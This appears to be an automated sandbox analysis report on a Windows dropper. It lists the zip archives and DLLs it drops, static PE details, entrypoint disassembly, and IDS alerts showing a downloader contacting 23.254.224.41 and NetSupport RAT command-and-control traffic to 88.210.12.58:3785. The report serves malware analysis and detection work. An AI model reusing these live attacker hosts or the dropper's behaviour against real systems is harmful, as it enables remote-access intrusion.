Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	64489
Entropy (8bit):	7.993298011514335
Encrypted:	true
SSDEEP:	1536:NFyQKEjEK5CXhJ8bVSSd1ck0fEHv1gqvK6CeLd2qyV0BlvqMKSK:LPIuCX8SSd1/0fEdDi6hzpPq13
MD5:	6177485D0E1E5E167AB65798E70D44AB
SHA1:	6634623E2B5359BC386A633358ADFD6F4DA9A64C
SHA-256:	7495676881CD5B7D6D09AD43F90529F6E6B2761697E5A24397F8E8E03FAF05DF
SHA-512:	920E5E8CCA53B9C825E7761631F36B61BFE6206EAA734B799BD82201147378EDD2B847EEAD9A66FB1020AC2F488B0CF1EF24FAE34F81AC7237BE6AAA1F26226D
Malicious:	false
Preview:	PK........e..H'...8...xI......PCICHEK.DLL.9y\S..s..a.R...@..(..(.....4%.......l.7A.Zeq...u...X..Jk..Zk..l.}..uo.....Z..L..[.?...}.sp..Y...3sc..H...@u8.j@.........c...c.H...?$.H/.-......Z..d...99o3..&y....h.q...{.p..J<....55.>/.l.!..h...7.h..\|...&.@GS,.w]....zm....J.P:..fo.y.oQ...; .NZ...\......!7Da...<g..N`v..Q.!t.:.%.!.....B.^j.x@/.G.Y..wE.....F.V..........L.E.:...."v...gk)2Nb.S...\|.....\c$/.Z.k.KF..{<g0..7.......d...GK.i.4..?..u..q{...Y....4d.[y.{.=~..F......f..n..=..o...k....F.TT.(.2......!..........i......;.....n>.c.)....6.........._.+...3...gG#................K.+a.....w.J.=.?.n..T+WWg..q..mP.>...;......0i?.q..S...O..H.tt.$.<u.f..g....w.$3.m.E...-.\..\|Pm........Z.E\...=.lo...7fE....u..z..e..z...SI.duk...OT....2.......j2.6.2D'.@.5...5*j......[.;j.Q....Iz..g.a.7Q0...q;...R...{!T....53..v8T..=.......<..9..l.>.Id`.t..\/?.3Z.n.RV.+....,...j.#......?..;@nv.;;.f...&....6.....$.o{.._.........../.q...x.6....;H.z.\V.b...}.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\2nd2_1[1].zip

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	41029
Entropy (8bit):	7.989346444055703
Encrypted:	false
SSDEEP:	768:ZBLBjV0IlNtNnLGs6b5SIco4N02W0EdocXH9bziI+Bw0cXMlDB4G:vTNtRLG9bg9ouVENbziVw0c879
MD5:	77DED36570B38B3C9F244ADBFC6599D6
SHA1:	5593CCC6E14D643938EF350BE7763943AD0472E9
SHA-256:	F0881EA39F315F08F7BE09ED39A610CE0AC7ABB85430411649D66C45074AC756
SHA-512:	A3DD37BFADF540EB9CB26E9A3CE831C393222B5E9B80198DE16A7DD27B74FB89083E5EBCAE178D3CB9DC5C723174EA4B41EC92536085C144E315ECFF64E1C2A5
Malicious:	false
Preview:	PK........\|..S.........J......msauserext.dll.\|.xS...,....b.C.P.I...%....-......`la=#9..H.......-.;l.n3.:. .m..L..z.F`..!Y..&$..7.LE.M.)..8h.....4.........{.=..s...9W.......B..R8L.I"?...HK../%'..~.IE..w.9]~....g...=.NA....D....m..ut:.........\|....~..I..W.~..o....nZ......s..Z...h.~^...ft....r....Z..7"..JH.b....5E`#Dy......A%]...!.F....JB..X..a.x..3.;ZJhE+7.K.x&..o..C6.P..K.FEf?....B........x.....?...~...!....r.?:P;.a.....D.qD28.....P.h ...d9.PF...o...\|~_+a6...2b.?...l.mD.....6./.......EH..3......@..l$. $.E...n.D6....AH-..!....PN ...}......hq....Y.XF.8.......\N.J...Fn.>!..$..v..2.,....8.0.....0f.;...0f.]...l.3[&dA.t_....n\|...g0.b6...z...p.av.. f#...(.f.`.........1...{d}......p..`..7.l...#..t.6.N..m..o\|......Z;}.F.~.~#..p........OU}.}...........a.......]U........v.N..'.......t9x......{..N....]..H"..pux.Y.^o....R...(im..=B..F.g.....kKJ}<emw.....m..@.j..v..x_..v.4..}..x9:...9......x.u>./..2./.5..._.u...t*...>.W..M...q.<\|.>..l#...[...{].\|]

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\loca[1].htm

Download File

Process:	C:\Users\user\AppData\Local\DNScache\client32.exe
File Type:	ASCII text, with no line terminators
Category:	modified
Size (bytes):	16
Entropy (8bit):	3.077819531114783
Encrypted:	false
SSDEEP:	3:llD:b
MD5:	C40449C13038365A3E45AB4D7F3C2F3E
SHA1:	CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
SHA-256:	1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
SHA-512:	3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
Malicious:	false
Preview:	40.7357,-74.1724

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\2nd2_2[1].zip

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1397545
Entropy (8bit):	7.996586865211503
Encrypted:	true
SSDEEP:	24576:ML8FKI/QnVC01gplou+ufwZwNDF3iioYr3oXPrPRB7t6U/9iYTN+sJvRf48c960H:G8N/QnYggLou+ufwZwNDF3D7wnR9iY8r
MD5:	3BE03950993CAB960114E6A5A1D8378E
SHA1:	81C1C423CE16056E361D73B2604BA3440C92F239
SHA-256:	72378062978693700F5DEC49F4E5AF35CF75B7061317766731A25044CFC437E3
SHA-512:	C521389A3D1539CE6E560F053DAA6C55219341C48E1CB88346481CE9E1DECE0EEBC6D8E7AFC06C8AD89F103BA191EBBFAEDA84DEF1B5DB659E5C85A98F9146E6
Malicious:	false
Preview:	PK........Aa.O..2S....:......mscpxl32.dLL.;.X\.g^d.Cfb....ub..v...a 0.($C .. ...yLf.....a.&7..U...6..6.._.D..!..$..Fkl.j.7,....$..........v._w...{........9..s)Y.K$..)d.#...)...t..E..!G"O..'>u[....ow.7:j[..j......x..-..-.`eY\|k{.59j.Z..zz.[..Rt......NKyW..Eun...T.....-...o..UMu6....b&.X$#?3.,..[\|...9...H.a...P..W....d2..(o._...G.~._.E....Cy..2P................/Or z8..t....d....;.....)..{..k.Z"...:..0$..On..[.<o.....x........v.x...Y[..x.I. [......7M..D...a..')..KT".?m.W.0..H..D.7L.o....\..>,...\5.',..d.B.<..M..X...J........V.I.C....!w.Z.M............e..Ya...V...i.........o.......lu....u......,.............._>.....k....o*l..^..[N...`.<>..N.O.....z'T......s.1.\.X..R.C...~c#...".P..m.c+......[I.>.l....}....xh...O..t...~.N%.O.i4u.....=.C=b.N](..#L.i.-zR..X.8..w.NB...}j...y...!..rO.g.G....R[s.'+^A.a....[...='.y.e..vn..U.Y......J.C.3G[8.......b..s.W...0.E.'.....^_5.....5...4.h.[".......(.R.$...u.+=..y.....`.a..<............%.u\U.lV.'8&.=!b...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\2nd2_4[1].zip

Download File

Process:	C:\Users\user\Desktop\lFxGd66yDa.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	787082
Entropy (8bit):	7.997955572815781
Encrypted:	true
SSDEEP:	24576:zKyeop5xuiZil2MroDAQPyLZ5FvFHj60Ywr:zK2lglVG5PWZ5FvcBc
MD5:	26ACC6BCC9C54A6D41233085F7D7CB33
SHA1:	5D19C99C9552332FD35D89B9EE7205133FD0A515
SHA-256:	BD409A9F5B3E37A0030D60473800F829417DAA09B69B65E7BD8FEDABEF9DC824
SHA-512:	0E777992563864765923F52B23600DA27697E609767B9C5246CF40E649255970650DD879E4D1E03FC8A6EDC69329247E09A990F177EE486DDBEFCEAE9AECA268
Malicious:	false
Preview:	PK........,a.O...Rb...........netmsg.dll.VMHTQ........D.'......P3...P...^3.q.y3.7.....A.."ZV...,Zh..lc.V.Q.].m..w..._."A.:.s..{..9...zO.#. D...X@.Z.1)..Ok.$.T.`.,...%=3....2c...Y.t'.3...Cf..#55.....+G>\.88Wd......7T?...)...@..c...q.".....v.L6...4.d.....+,.X.gF.\|.VHF.r..Ud.U..'5..Q$kOf....h..k..q=7...c.&].29..sXC.&7.....r.j6..\...E....z..y...t.l...y..SCcTAyb'....k1D.#.n.-.._f.]......\|y..#.;fn.k...>.\|..9.!W..mn...u.5.ph.X.....z........qt.....#..i........m'....-C..dku...m'.G.c?..(.!d."...ZKb.6-;8.4e..L#...K.&...l#~.2)d`Q~..X..b...b...G>G..H..Hk.Ir.P..[`.\|..=.M"....b.W$<.H..N..HM.\|.F..<..(...G.~.26..'$.m.....(..VZM.F.C..!y.....2.H.).N ./.....h..d0%.M0z..{.......QZ.....LeGEw....h....dR.]..a.....Y...!.A........O.~....C.=.'q...3%..Q..WyE...vy.F..].d..{Hn.W..u......n.`iyi.....n)..n....s..w.>.._..?.}b....^....n...k.\|G_Yw.<.......+!W.x.^S...!....PK........s..V...(............TCCTL32.DLL.{`T...~..\`.....X."ADV..D.c...v...'&.-...Z.]A.!t.m

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.434736308213813
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	lFxGd66yDa.exe
File size:	5'112'587 bytes
MD5:	ecfdde187846c27fef59c61d42d474b3
SHA1:	25d35ff7f5c38626bd77b5cd9fed849fd1186499
SHA256:	d5f5204efc969b0a9a132413c637f09bce02cff7ea932c504d418e80265158f9
SHA512:	08ac6368aa2857c6201b6812d4adffb7e690f16750bc7b39b3116076fec10aa716c4a868afe9310984ad94f71e65df91fe813ed415f0deee562ceeaf4f800f5e
SSDEEP:	98304:HZVS4lyfvsVqltyD5DhADNlXQ2orLmKeLDCVvANLA1pOuI8F7fqLmLhPR6x7:OkPD52
TLSH:	60368E49F1D1ACAAD52BC67482DAE7337639B44C0325EF275680EE342D27BC06E27E45
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\]...<h..<h..<h.SDk..<h.SDm..<h.SDl..<h...m.2<h...l..<h...k..<h.SDi..<h..<i.i<h.r.a..<h.r....<h.r.j..<h.Rich.<h................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4073fa
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6561BDA3 [Sat Nov 25 09:25:55 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	35ca174cb7a0dd69ac56ae5f0ce996e5

Entrypoint Preview

Instruction
call 00007F4FAD0D22C4h
jmp 00007F4FAD0D1D7Fh
jmp 00007F4FAD0D7027h
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F4FAD0D1F5Dh
mov dword ptr [esi], 0041921Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00419224h
mov dword ptr [ecx], 0041921Ch
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F4FAD0D1F2Ah
mov dword ptr [esi], 00419238h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00419240h
mov dword ptr [ecx], 00419238h
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004191FCh
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F4FAD0D3111h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 004191FCh
push eax
call 00007F4FAD0D315Ch
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004191FCh
push eax
call 00007F4FAD0D3145h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x20e7c	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25000	0x133c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x20480	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x19000	0x19c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1767f	0x17800	d8130d75dfca9e2759c221e442aad28b	False	0.5903631981382979	data	6.638540763857237	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x19000	0x87e6	0x8800	78cf3053082e55486bc34273cd165aea	False	0.4685489430147059	data	5.058924359157263	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x22000	0x14a4	0xa00	56f89838282ee4d16f98ce00bea3f3c8	False	0.163671875	data	2.2329908576039887	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x24000	0x1e0	0x200	e8f29e6669a480a4d72efeb174b889d9	False	0.52734375	data	4.7176788329467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x25000	0x133c	0x1400	c9d098ce7acb412e4277afe993baeb5c	False	0.7755859375	data	6.476134917020887	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.config	0x27000	0x1000	0x200	460ac1721a808033da4de8fd504a756d	False	0.97265625	data	7.241876393827441	IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x24060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetOpenUrlW
SHELL32.dll	SHGetSpecialFolderPathW, ShellExecuteW, SHCreateDirectoryExW
SHLWAPI.dll	PathCombineW, PathFileExistsW
KERNEL32.dll	HeapSize, SetFilePointerEx, LCMapStringW, lstrlenA, lstrcmpA, HeapAlloc, GetProcessHeap, HeapFree, ExpandEnvironmentStringsW, SetFileAttributesW, Sleep, lstrcatW, lstrlenW, GetSystemDirectoryW, GetCurrentProcess, GetModuleFileNameW, FlushFileBuffers, GetLastError, HeapReAlloc, CloseHandle, ExitProcess, CreateProcessW, CreateDirectoryW, ReadFile, WriteFile, SetFileTime, SetFilePointer, CreateFileW, GetFileAttributesW, MultiByteToWideChar, LocalFileTimeToFileTime, GetCurrentDirectoryW, SystemTimeToFileTime, WideCharToMultiByte, GetConsoleOutputCP, GetConsoleMode, DecodePointer, CreateMutexW, GetSystemTimeAsFileTime, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, WriteConsoleW, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, GetModuleHandleExW, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetStringTypeW
USER32.dll	wsprintfW
ADVAPI32.dll	GetTokenInformation, RegCloseKey, RegSetValueExW, RegOpenKeyW, OpenProcessToken

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-10T08:57:17.526632+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49707	23.254.224.41	443	TCP
2024-12-10T08:57:19.700702+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49708	23.254.224.41	443	TCP
2024-12-10T08:57:24.601259+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49710	23.254.224.41	443	TCP
2024-12-10T08:57:26.969053+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49712	23.254.224.41	443	TCP
2024-12-10T08:57:31.114762+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:57:31.506215+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:20.568018+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:30.170965+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:31.992977+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:32.192953+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:32.394956+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:32.494983+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:32.595953+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:32.695980+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:32.796147+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:32.896063+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:32.996961+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:33.099984+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:33.200966+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:33.353287+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:33.353287+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:33.763049+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:33.963985+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.064987+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.164977+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.265989+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.365963+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.466018+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.566974+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.667007+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.768093+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.868968+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.972688+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.069954+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.169980+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.270969+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.371106+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.471004+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.572691+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.676705+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.773044+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.873998+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.975028+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.075000+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.174981+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.276001+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.375993+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.476971+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.577983+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.677994+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.778011+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.879720+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.979493+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.080699+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.180688+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.278974+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.379064+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.479958+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.579973+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.679980+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.784524+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.881237+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.982070+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.091120+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.191974+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.291992+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.393031+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.493013+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.593968+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.695107+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.794981+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.898696+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.998759+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:39.095974+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:39.196975+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:39.298964+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:39.401810+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:39.502999+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:39.603005+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
